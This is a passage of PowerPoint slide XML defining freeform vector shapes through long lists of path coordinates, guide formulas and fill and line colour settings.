                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="77"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36164" name="Freeform 297"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1575" y="2748"/>
                <a:ext cx="215" cy="187"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 215"/>
                  <a:gd name="T1" fmla="*/ 122 h 187"/>
                  <a:gd name="T2" fmla="*/ 173 w 215"/>
                  <a:gd name="T3" fmla="*/ 131 h 187"/>
                  <a:gd name="T4" fmla="*/ 162 w 215"/>
                  <a:gd name="T5" fmla="*/ 136 h 187"/>
                  <a:gd name="T6" fmla="*/ 143 w 215"/>
                  <a:gd name="T7" fmla="*/ 131 h 187"/>
                  <a:gd name="T8" fmla="*/ 143 w 215"/>
                  <a:gd name="T9" fmla="*/ 137 h 187"/>
                  <a:gd name="T10" fmla="*/ 150 w 215"/>
                  <a:gd name="T11" fmla="*/ 158 h 187"/>
                  <a:gd name="T12" fmla="*/ 159 w 215"/>
                  <a:gd name="T13" fmla="*/ 163 h 187"/>
                  <a:gd name="T14" fmla="*/ 147 w 215"/>
                  <a:gd name="T15" fmla="*/ 172 h 187"/>
                  <a:gd name="T16" fmla="*/ 132 w 215"/>
                  <a:gd name="T17" fmla="*/ 181 h 187"/>
                  <a:gd name="T18" fmla="*/ 123 w 215"/>
                  <a:gd name="T19" fmla="*/ 180 h 187"/>
                  <a:gd name="T20" fmla="*/ 106 w 215"/>
                  <a:gd name="T21" fmla="*/ 180 h 187"/>
                  <a:gd name="T22" fmla="*/ 100 w 215"/>
                  <a:gd name="T23" fmla="*/ 167 h 187"/>
                  <a:gd name="T24" fmla="*/ 89 w 215"/>
                  <a:gd name="T25" fmla="*/ 151 h 187"/>
                  <a:gd name="T26" fmla="*/ 93 w 215"/>
                  <a:gd name="T27" fmla="*/ 136 h 187"/>
                  <a:gd name="T28" fmla="*/ 87 w 215"/>
                  <a:gd name="T29" fmla="*/ 119 h 187"/>
                  <a:gd name="T30" fmla="*/ 90 w 215"/>
                  <a:gd name="T31" fmla="*/ 108 h 187"/>
                  <a:gd name="T32" fmla="*/ 75 w 215"/>
                  <a:gd name="T33" fmla="*/ 98 h 187"/>
                  <a:gd name="T34" fmla="*/ 60 w 215"/>
                  <a:gd name="T35" fmla="*/ 96 h 187"/>
                  <a:gd name="T36" fmla="*/ 45 w 215"/>
                  <a:gd name="T37" fmla="*/ 84 h 187"/>
                  <a:gd name="T38" fmla="*/ 22 w 215"/>
                  <a:gd name="T39" fmla="*/ 83 h 187"/>
                  <a:gd name="T40" fmla="*/ 17 w 215"/>
                  <a:gd name="T41" fmla="*/ 66 h 187"/>
                  <a:gd name="T42" fmla="*/ 5 w 215"/>
                  <a:gd name="T43" fmla="*/ 49 h 187"/>
                  <a:gd name="T44" fmla="*/ 7 w 215"/>
                  <a:gd name="T45" fmla="*/ 35 h 187"/>
                  <a:gd name="T46" fmla="*/ 20 w 215"/>
                  <a:gd name="T47" fmla="*/ 17 h 187"/>
                  <a:gd name="T48" fmla="*/ 24 w 215"/>
                  <a:gd name="T49" fmla="*/ 7 h 187"/>
                  <a:gd name="T50" fmla="*/ 28 w 215"/>
                  <a:gd name="T51" fmla="*/ 7 h 187"/>
                  <a:gd name="T52" fmla="*/ 24 w 215"/>
                  <a:gd name="T53" fmla="*/ 18 h 187"/>
                  <a:gd name="T54" fmla="*/ 26 w 215"/>
                  <a:gd name="T55" fmla="*/ 27 h 187"/>
                  <a:gd name="T56" fmla="*/ 22 w 215"/>
                  <a:gd name="T57" fmla="*/ 41 h 187"/>
                  <a:gd name="T58" fmla="*/ 32 w 215"/>
                  <a:gd name="T59" fmla="*/ 50 h 187"/>
                  <a:gd name="T60" fmla="*/ 37 w 215"/>
                  <a:gd name="T61" fmla="*/ 42 h 187"/>
                  <a:gd name="T62" fmla="*/ 31 w 215"/>
                  <a:gd name="T63" fmla="*/ 29 h 187"/>
                  <a:gd name="T64" fmla="*/ 30 w 215"/>
                  <a:gd name="T65" fmla="*/ 22 h 187"/>
                  <a:gd name="T66" fmla="*/ 51 w 215"/>
                  <a:gd name="T67" fmla="*/ 14 h 187"/>
                  <a:gd name="T68" fmla="*/ 57 w 215"/>
                  <a:gd name="T69" fmla="*/ 11 h 187"/>
                  <a:gd name="T70" fmla="*/ 55 w 215"/>
                  <a:gd name="T71" fmla="*/ 8 h 187"/>
                  <a:gd name="T72" fmla="*/ 48 w 215"/>
                  <a:gd name="T73" fmla="*/ 4 h 187"/>
                  <a:gd name="T74" fmla="*/ 54 w 215"/>
                  <a:gd name="T75" fmla="*/ 1 h 187"/>
                  <a:gd name="T76" fmla="*/ 57 w 215"/>
                  <a:gd name="T77" fmla="*/ 8 h 187"/>
                  <a:gd name="T78" fmla="*/ 62 w 215"/>
                  <a:gd name="T79" fmla="*/ 11 h 187"/>
                  <a:gd name="T80" fmla="*/ 76 w 215"/>
                  <a:gd name="T81" fmla="*/ 16 h 187"/>
                  <a:gd name="T82" fmla="*/ 85 w 215"/>
                  <a:gd name="T83" fmla="*/ 28 h 187"/>
                  <a:gd name="T84" fmla="*/ 109 w 215"/>
                  <a:gd name="T85" fmla="*/ 25 h 187"/>
                  <a:gd name="T86" fmla="*/ 123 w 215"/>
                  <a:gd name="T87" fmla="*/ 33 h 187"/>
                  <a:gd name="T88" fmla="*/ 140 w 215"/>
                  <a:gd name="T89" fmla="*/ 32 h 187"/>
                  <a:gd name="T90" fmla="*/ 161 w 215"/>
                  <a:gd name="T91" fmla="*/ 25 h 187"/>
                  <a:gd name="T92" fmla="*/ 177 w 215"/>
                  <a:gd name="T93" fmla="*/ 26 h 187"/>
                  <a:gd name="T94" fmla="*/ 165 w 215"/>
                  <a:gd name="T95" fmla="*/ 29 h 187"/>
                  <a:gd name="T96" fmla="*/ 176 w 215"/>
                  <a:gd name="T97" fmla="*/ 41 h 187"/>
                  <a:gd name="T98" fmla="*/ 185 w 215"/>
                  <a:gd name="T99" fmla="*/ 38 h 187"/>
                  <a:gd name="T100" fmla="*/ 200 w 215"/>
                  <a:gd name="T101" fmla="*/ 46 h 187"/>
                  <a:gd name="T102" fmla="*/ 184 w 215"/>
                  <a:gd name="T103" fmla="*/ 59 h 187"/>
                  <a:gd name="T104" fmla="*/ 197 w 215"/>
                  <a:gd name="T105" fmla="*/ 59 h 187"/>
                  <a:gd name="T106" fmla="*/ 215 w 215"/>
                  <a:gd name="T107" fmla="*/ 64 h 187"/>
                  <a:gd name="T108" fmla="*/ 203 w 215"/>
                  <a:gd name="T109" fmla="*/ 79 h 187"/>
                  <a:gd name="T110" fmla="*/ 203 w 215"/>
                  <a:gd name="T111" fmla="*/ 88 h 187"/>
                  <a:gd name="T112" fmla="*/ 193 w 215"/>
                  <a:gd name="T113" fmla="*/ 101 h 187"/>
                  <a:gd name="T114" fmla="*/ 203 w 215"/>
                  <a:gd name="T115" fmla="*/ 116 h 187"/>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215"/>
                  <a:gd name="T175" fmla="*/ 0 h 187"/>
                  <a:gd name="T176" fmla="*/ 215 w 215"/>
                  <a:gd name="T177" fmla="*/ 187 h 187"/>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215" h="187">
                    <a:moveTo>
                      <a:pt x="203" y="116"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="204" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="116"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
